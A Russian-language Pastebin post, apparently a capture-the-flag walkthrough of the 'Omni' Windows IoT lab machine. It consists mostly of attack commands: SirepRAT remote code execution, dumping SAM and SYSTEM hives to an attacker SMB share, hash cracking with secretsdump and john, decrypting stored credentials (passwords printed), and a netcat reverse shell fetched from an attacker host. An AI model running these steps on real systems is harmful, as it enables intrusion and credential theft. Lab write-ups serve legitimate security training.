askanton

Эксплуатация виртуальной машины Omni.

Jan 14th, 2021 (edited)
1,308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.10 KB | None | 0 0
  1. manual https://youtu.be/CsZWZpGm6z8
  2.  
  3.  
  4. ping 10.10.10.204
  5. Смотрим ttl
  6.  
  7. sudo nmap -sS -sV -A -p- -vv 10.10.10.204
  8. -sS sin scan
  9. -sV определяем версию
  10. -А версия операционки
  11. -p- все порты
  12. -vv вывод отчёта
  13.  
  14. Находим порты 8080, 135, 5985,
  15.  
  16. заходим на 10.10.10.204:8080
  17.  
  18. гуглим Windows Device Portal, делаем вывод что это Windows IOT
  19.  
  20. гуглим Windows Device Portal exploit
  21.  
  22. находим https://github.com/SafeBreach-Labs/SirepRAT
  23.  
  24. git clone https://github.com/SafeBreach-Labs/SirepRAT.git
  25. cd SirepRAT/
  26. ls
  27. nano requirements.txt
  28. pip3 install -r requirements.txt
  29. python3 SirepRAT.py --help
  30.  
  31. проверяем работу python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
  32.  
  33.  
  34. Проверяем возможность запуска удалённых команд
  35. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
  36.  
  37. Определяем что мы пользователь System
  38.  
  39. разворачиваем у себя smb сервер
  40.  
  41. sudo nano /etc/samba/smb.conf
  42.  
  43. добавляем
  44. [Public]
  45. comment = Pub
  46. path = /tmp/Public
  47. browseable = yes
  48. read only = no
  49. guest ok = yes
  50.  
  51.  
  52. mkdir /tmp/Public
  53. chmod 777 /tmp/Public
  54. sudo service smbd restart
  55.  
  56. копируем ветку реестра
  57. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SYSTEM C:\SYSTEM"
  58.  
  59. копируем сем
  60. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SAM C:\SAM"
  61.  
  62. sudo ifconfig
  63.  
  64. забираем реестр
  65. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SYSTEM \\\\10.10.14.112\\Public\\SYSTEM"
  66.  
  67. забираем сем
  68. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SAM \\\\10.10.14.112\\Public\\SAM"
  69.  
  70. ломаем
  71.  
  72. отключаем впн
  73. git clone https://github.com/SecureAuthCorp/impacket.git
  74. python3 ./impacket/examples/secretsdump.py -system /tmp/Public/SYSTEM -sam /tmp/Public/SAM LOCAL
  75.  
  76. создаем файл с хешем e3cb0651718ee9b4faffe19a51faff95
  77.  
  78. ломаем хеш
  79. sudo john --fork=4 --format=nt /home/kali/Desktop//hash --wordlist=/home/kali/Desktop/rockyou.txt
  80. sudo echo "e3cb0651718ee9b4faffe19a51faff95" > hash john --fork=4 --format=nt /home/kali/Desktop/hash --wordlist=/home/kali/Desktop/rockyou.txt
  81. пароль mesh5143
  82.  
  83. заходим на сайт
  84.  
  85. echo %USERPROFILE%
  86. dir C:\Data\Users\app
  87. more C:\Data\Users\app\user.txt
  88. more C:\Data\Users\app\hardening.txt
  89.  
  90. powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"
  91.  
  92.  
  93.  
  94. dir C:\Data\Users\app
  95. more C:\Data\Users\app\iot-admin.xml
  96.  
  97. powershell -c "$credential = import-clixml -path C:\Data\Users\app\iot-admin.xml;$credential.GetNetworkCredential().password"
  98.  
  99.  
  100. administrator
  101. _1nt3rn37ofTh1nGz
  102.  
  103. echo %USERPROFILE%
  104. dir C:\Data\Users\administrator
  105.  
  106. more C:\Data\Users\administrator\root.txt
  107.  
  108.  
  109. powershell -c "$credential = import-clixml -path C:\Data\Users\Administrator\root.txt;$credential.GetNetworkCredential().password"
  110.  
  111.  
  112.  
  113. Доп
  114.  
  115. отключаем впн
  116. git clone https://github.com/Shreda/pentestTools
  117. https://eternallybored.org/misc/netcat/
  118.  
  119. python -m SimpleHTTPServer
  120.  
  121. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -Uri http://10.10.14.133:8000/Desktop/nc64.exe" --v
  122.  
  123.  
  124. nc -lvp 7777
  125.  
  126. python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.133 1234" --v
  127.  
  128. hostname
Add Comment
Please, Sign In to add comment